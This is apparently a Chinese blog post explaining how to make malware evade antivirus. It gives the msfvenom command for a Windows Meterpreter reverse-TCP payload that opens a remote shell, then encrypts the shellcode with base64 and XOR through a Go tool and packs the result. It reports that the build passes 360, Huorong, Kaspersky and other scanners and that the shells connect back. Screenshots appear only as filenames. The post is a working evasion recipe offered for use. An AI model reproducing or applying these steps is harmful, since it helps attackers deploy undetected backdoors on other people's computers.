前言

本来整合了几个项目,python+go的免杀基本上过所有主流杀软(自测的火绒、电脑管家、瑞星、360、卡巴斯基),但是因为刚下载的360没有取消勾选,样本被自动上传了,于是乎,第二天就被报毒了。

微信图片_20230119230420

不得不说360的白嫖是做的挺好

免杀

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c

微信图片_20230119230654

shellcode进行加密

go run main.go -i payload.bin -o .\1.txt -base64 -v

微信图片_20230119230739

其实这里直接使用hex的结果就可以了,直接运行混编生成可执行文件

go run main.go

微信图片_20230119230818

查杀效果

微信图片_20230119230855

因为火绒不过的效果可能不好,加壳的效果

微信图片_20230119230935

查看火绒查杀的效果

微信图片_20230119230959

没有问题。

上线效果

微信图片_20230119231029

发现上线均无问题。

扩展

这里的话其实可以另外扩展思路。

go run main.go -i payload.bin -o .\2.txt -mode encrypt -type xor -key qwe -v

微信图片_20230119231131

修改main.go进行打包

微信图片_20230119231205

火绒查杀报毒

微信图片_20230119231233

但是做处理之后无毒

微信图片_20230119231303

比如说自写的算法是可以实现免杀的。